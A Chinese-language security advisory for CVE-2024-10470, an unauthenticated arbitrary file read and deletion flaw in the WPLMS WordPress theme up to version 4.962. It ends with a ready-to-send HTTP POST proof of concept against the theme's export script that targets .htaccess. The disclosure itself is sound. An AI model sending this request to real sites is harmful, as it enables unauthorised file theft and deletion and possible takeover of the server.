WPLMS Learning Management System for WordPress <= 4.962 – 未经认证的任意文件读取与删除
WPLMS Learning Management System for WordPress(WordPress LMS 主题)在所有版本(包括 4.962)中,由于 readfile 和 unlink 函数对文件路径验证和权限检查不足,存在任意文件读取与删除漏洞。这使得未经认证的攻击者可以删除服务器上的任意文件,当删除正确的文件(如 wp-config.php)时,极易导致远程代码执行。即使该主题未被激活,也仍存在漏洞。
受影响的主题: WPLMS Learning Management System for WordPress
主题标识: wplms
受影响版本: <= 4.962
CVE ID: CVE-2024-10470
CVSS 分数: 9.8 (严重)
CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
研究人员: Foxyyy
完全修补版本: 4.963
POST /wp-content/themes/wplms/setup/installer/envato-setup-export.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
download_export_zip=1&zip_file=.htaccess